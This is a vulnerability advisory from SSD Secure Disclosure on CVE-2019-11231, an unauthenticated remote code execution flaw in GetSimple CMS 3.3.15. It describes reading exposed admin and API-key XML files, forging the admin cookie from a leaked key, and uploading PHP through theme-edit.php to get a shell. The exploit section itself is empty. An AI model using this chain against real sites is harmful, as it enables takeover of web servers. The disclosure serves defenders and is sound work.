... Loading ...

SSD Secure Disclosure

Disclosing vulnerabilities responsibly since 2007
Dark Theme

SSD Advisory – GetSimple CMS Unauthenticated Remote Code Execution

Vulnerabilities Summary
The following advisory describes a vulnerability in GetSimple CMS which allows unauthenticated attackers to perform Remote Code Execution.

CVE
CVE-2019-11231

Credit
An independent Security Researcher, truerand0m, has reported this vulnerability to SSD Secure Disclosure program.

Affected systems
GetSimple CMS version 3.3.15 (Latest at the time of writing this post) and before.

Vendor Response
We have notified the vendor on the 21/1/2019 and sent few reminder emails but got no response from the vendor.

Vulnerability Details
An insufficient input sanitation is in the theme-edit.php file allows to upload files with arbitrary content (PHPcode for example). This vulnerability can be triggered by an authenticated user, however authentication can be bypassed.

According to the official installation documentation, specially, step 10, an admin is required to upload all the files, including the .htaccess files and run a health check.

However, what is overlooked is that Apache by default does not enable “allowoverride” directive anymore so we can expose passwords:

http://localhost/GetSimpleCMS-3.3.15/data/users/admin.xml

The problem is that the passwords are hashed so we need a way to bypass this issue. We can access the API key in:

http://localhost/GetSimpleCMS-3.3.15/data/other/authorization.xml

What this allows us to do is target the session state, since they decided to roll their own implementation. Inside of admin/inc/configuration.php we see the following code:

The cookie_name is crafted information that can be leaked from the frontend (site name and version). Then, later in admin/inc/cookie_functions.php we can see the following code:

If someone leaks the API key (44769f621e9b7db1bb19adbdf659b015) and the admin username (admin) then they can bypass authentication. To do so, they need to supply a cookie that is set to:

sha1(getsimple_cookie_3315 + 44769f621e9b7db1bb19adbdf659b015) = sha1(admin + 44769f621e9b7db1bb19adbdf659b015)
Cookie: GS_ADMIN_USERNAME {username};sha1(getsimple_cookie_{cmsversion}{salt})=sha1({username}{salt});

The vulnerability exists in the admin/theme-edit.php file. This file checks for forms submissions via POST request and for the CSRF nonce passed. If the nonce sent is correct then the file provided by the user is uploaded.

The vulnerability is a path traversal allowing to write outside the jailed themes directory root. However, we don’t even need it due to the .htaccess assumption, we can write into the same directory to gain a shell.

The other issue here is that there isn’t another check on the extension before saving the file. The file is being saved with the assumption that the parameter content is safe. This allows the creation of web accessible and executable files with arbitrary content.

Exploit

Print Friendly, PDF & Email

Leave a Reply